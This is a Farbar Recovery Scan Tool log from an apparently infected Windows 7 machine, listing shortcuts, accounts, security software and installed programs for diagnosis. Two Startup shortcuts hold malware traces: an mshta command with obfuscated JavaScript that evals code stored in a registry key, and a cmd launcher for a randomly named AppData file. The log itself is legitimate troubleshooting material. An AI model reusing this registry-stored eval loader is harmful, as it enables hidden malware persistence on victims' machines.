Shortcut: C:\Users\Public\Desktop\Malwarebytes.lnk -> D:\Program Files\Malwarebytes\Anti-Malware\mbam.exe (Malwarebytes)
Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Public\Desktop\Skype.lnk -> C:\Windows\Installer\{FC965A47-4839-40CA-B618-18F486F042C6}\SkypeIcon.exe ()
Shortcut: C:\Users\Public\Desktop\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Public\Desktop\World of Warcraft.lnk -> D:\World of Warcraft\World of Warcraft Launcher.exe (Blizzard Entertainment)
Shortcut: C:\Users\Public\Desktop\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\Users\Public\Desktop\XSplit Gamecaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe (SplitmediaLabs)
 
 
 
 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DefaultPrograms
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk -> C:\Windows\System32\wuapp.exe (Microsoft Corporation) -> startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office15\FIRSTRUN.EXE (Microsoft Corporation) -> /OEM
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk -> C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation) -> /showgadgets
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision preview pack 1.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /show
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Disable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /disable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Enable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /enable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.BackupAndRestore
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Calendar.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> calendar
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Contacts.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> contacts
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Find My iPhone.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> find
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Keynote.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> keynote
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Mail.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> mail
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Notes.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> notes
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Numbers.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> numbers
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Pages.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> pages
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Reminders.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> reminders
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN\DW WLAN Card Utility.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> shell32.dll,,Control_RunDLL C:\Windows\system32\bcmwlcpl.CPL
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Notifications.lnk -> C:\Program Files\Dell\Dell Foundation Services\ShellHelper.exe (Dell) -> /FromShortcut
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\SupportAssist\SupportAssist.lnk -> C:\Program Files\Dell\SupportAssist\pcdlauncher.exe (PC-Doctor, Inc.) -> -lloc dsc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk -> C:\Windows\System32\secpol.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -NoExit -ImportSystemModules
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation) -> /open
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> %SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Owner\Desktop\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\Desktop\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) -> "javascript:CKS2wI="jfeb5ohb";TB0=new ActiveXObject("WScript.Shell");u3zJmwRL="gDj1bM";cIhP8=TB0.RegRead("HKCU\\software\\bykshfet\\noce");G7E1Wrjo="YFJO";eval(cIhP8);C2tiiv4T="yYep6F6";"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /C start "" "C:\Users\Owner\AppData\Roaming\8f902\c6d2f.9a4d38"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) ->  -extoff
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.) -> /sendto:
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
 
 
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam Support Center.url -> URL: hxxp://support.steampowered.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox Website.URL -> 
InternetURL: C:\Users\Owner\Favorites\Links for United States\GobiernoUSA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129792
InternetURL: C:\Users\Owner\Favorites\Links for United States\USA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129791
InternetURL: C:\Users\Owner\Favorites\Links\Suggested Sites.url -> URL: hxxps://ieonline.microsoft.com/#ieslice
InternetURL: C:\Users\Owner\Favorites\Links\Web Slice Gallery.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=121315
InternetURL: C:\Users\Owner\Favorites\Dell\Dell Auction.url -> URL: hxxp://www.dellauction.com/
InternetURL: C:\Users\Owner\Favorites\Dell\Dell.url -> URL: hxxp://www.dell.com/
InternetURL: C:\Users\Owner\Favorites\Dell\Support.Dell.Com.url -> URL: hxxp://www.dell.com/support/home
InternetURL: C:\Users\Owner\Desktop\Borderlands 2.url -> URL: steam://rungameid/49520
InternetURL: C:\Users\Owner\Desktop\Dino D-Day.url -> URL: steam://rungameid/70000
InternetURL: C:\Users\Owner\Desktop\Goat Simulator.url -> URL: steam://rungameid/265930
InternetURL: C:\Users\Owner\Desktop\Orcs Must Die! Unchained.url -> URL: steam://rungameid/427270
InternetURL: C:\Users\Owner\Desktop\Ostrich Island.url -> URL: steam://rungameid/337270
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links for United States\GobiernoUSA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129792
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links for United States\USA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129791
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links\Web Slice Gallery.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=121315
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Dell Auction.url -> URL: hxxp://www.dellauction.com/
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Dell.url -> URL: hxxp://www.dell.com/
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Support.Dell.Com.url -> URL: hxxp://www.dell.com/support/home
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Borderlands 2.url -> URL: steam://rungameid/49520
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dead by Daylight BETA.url -> URL: steam://rungameid/471230
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dino D-Day.url -> URL: steam://rungameid/70000
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Goat Simulator.url -> URL: steam://rungameid/265930
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Orcs Must Die! Unchained.url -> URL: steam://rungameid/427270
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Ostrich Island.url -> URL: steam://rungameid/337270
 
==================== End of Shortcut.txt =============================
 
FRST:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Owner (08-01-2017 16:12:42)
Running from C:\Users\Owner\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-01-30 01:19:55)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1863785947-2063213224-1850305329-500 - Administrator - Disabled)
Guest (S-1-5-21-1863785947-2063213224-1850305329-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1863785947-2063213224-1850305329-1002 - Limited - Enabled)
Owner (S-1-5-21-1863785947-2063213224-1850305329-1000 - Administrator - Enabled) => C:\Users\Owner
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.2.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Fuse CC (Preview) (HKLM-x32\...\{06F1F289-ACFE-43A2-A654-7950079D6685}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015.3 (HKLM-x32\...\ILST_20_1_0) (Version: 20.1.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.7 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_4_0) (Version: 10.4.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015.5 (HKLM-x32\...\PHSP_17_0_1) (Version: 17.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.17)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.17 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader Driver  (HKLM-x32\...\InstallShield_{E9D8E2D2-4928-437D-ADC6-2EFA7B678FC3}) (Version: 18.5.1844.33907 - Alcor Micro Corp.)
Alcor Micro USB Card Reader Driver  (x32 Version: 18.5.1844.33907 - Alcor Micro Corp.) Hidden
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software)
Blender (HKLM\...\{47A0EA10-D506-4473-AE99-5E07DD1062DE}) (Version: 2.77.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Dead by Daylight: BETA (HKLM\...\Steam App 471230) (Version:  - )
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.)
Dell Data Vault (Version: 4.3.9.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F127834}) (Version: 3.4.15000.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{27130E51-9555-408B-8134-7BFF54EDE27B}) (Version: 1.3.0.72 - Dell)
Dell System Detect (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\58d94f3ce2c27db0) (Version: 6.12.0.5 - Dell)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dino D-Day (HKLM-x32\...\Steam App 70000) (Version:  - 800 North and Digital Ranch)
Discord (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
DW WLAN Card Utility (HKLM\...\DW WLAN Card Utility) (Version: 6.30.223.262 - Dell Inc.)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Goat Simulator (HKLM-x32\...\Steam App 265930) (Version:  - Coffee Stain Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.5.0.1165 - Citrix Systems, Inc.)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
Intel® Chipset Device Software (x32 Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1167 - Intel Corporation)
Intel® Network Connections 20.2.3001.0 (HKLM\...\PROSetDX) (Version: 20.2.3001.0 - Intel)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 4.0.0.36 - Intel Corporation)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
Malwarebytes version 3.0.5.1299 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.5.1299 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.6073.1 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 368.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Orcs Must Die! Unchained (HKLM\...\Steam App 427270) (Version:  - Robot Entertainment)
Ostrich Island (HKLM-x32\...\Steam App 337270) (Version:  - MeDungeon Ltd.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Realtek USB Audio (HKLM-x32\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.41 - Realtek Semiconductor Corp.)
SafeZone Stable 1.48.2066.44 (x32 Version: 1.48.2066.44 - Avast Software) Hidden
SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.16-2 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
